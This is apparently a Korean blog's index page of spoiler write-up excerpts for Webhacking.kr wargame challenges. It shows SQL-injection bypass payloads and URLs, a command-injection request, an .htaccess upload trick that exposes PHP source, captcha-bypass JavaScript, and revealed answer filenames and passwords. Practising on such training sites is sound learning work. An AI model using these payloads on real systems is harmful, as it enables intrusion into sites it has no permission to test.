본문 바로가기

Hacking/Webhacking.kr(스포주의)

(42)
Webhacking.kr 48 '&l's hello challenge44_PaSs_w0Rd___.php index index.php
Webhacking.kr 48 Command Injection 문제입ㄴ다. 파일을 처리하는 함수를 상상한다. POST /challenge/bonus/bonus-12/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 372Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome..
Webhacking.kr 18 (eregi(" |/|\(|\)|\t|\||&|union|select|from|0x",$_GET[no])) exit("no hack"); select id from challenge18_table where id='guest' and no=입력값 이므로, -1 or
Webhacking.kr 28 소스를 봐야 할 것 같다. .htaccess파일을 업로드하자. AddType Application/x-httpd-php-source .phps php_flag engine 0 php_value engine "off"
Webhacking.kr 20 20번 lv5frm.id.value="userid";lv5frm.cmt.value="hi"; lv5frm.hack.value=lv5frm.attackme.value; // captcha의 문자를 바로 hack변수에 저장하여 Submit 할 수 있다. lv5frm.submit();
Webhacking.kr 27 $q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error"); if($q[id]=="guest") echo("guest");if($q[id]=="admin") @solve(); 소스는 위와 같다. 32)+OR+no+like+1%20--%20http://webhacking.kr/challenge/web/web-12/index.php?no=32)%20or%20no%20like%202%20--%20 no id 2 admin 1 guest
Webhacking.kr 56 이유없는 기능은 없을것이다. 검색창이 존재하므로 문자를 입력해본다.hi를 검색하였을때 hi~가 검색되는것으로 보아, like "%입력값%"으로 쿼리가 구성되어 있을 것으로 추정된다. 검색어 _______을 검색해보았을때 admin의 글이 나오는 것으로 보아 비밀글의 내용은 7자리임을 추정할 수 있다. Burpsuite Intruder기능을 통해 브루트포싱 해보니k______로 정답이 좁혀지고 인간러닝을 통해 kk.php임을 추측 할 수 있었다.
Webhacking.kr 58 원래 Sothink Decomplier등의 SWF디컴파일러로 디컴 해야하나, 단순한 문제라서 strings로도 볼 수 있었다. http://webhacking.kr/challenge/web/web-35/g1v2m2passw0rd.php 해당 링크로 접속하면 문제 풀림 !W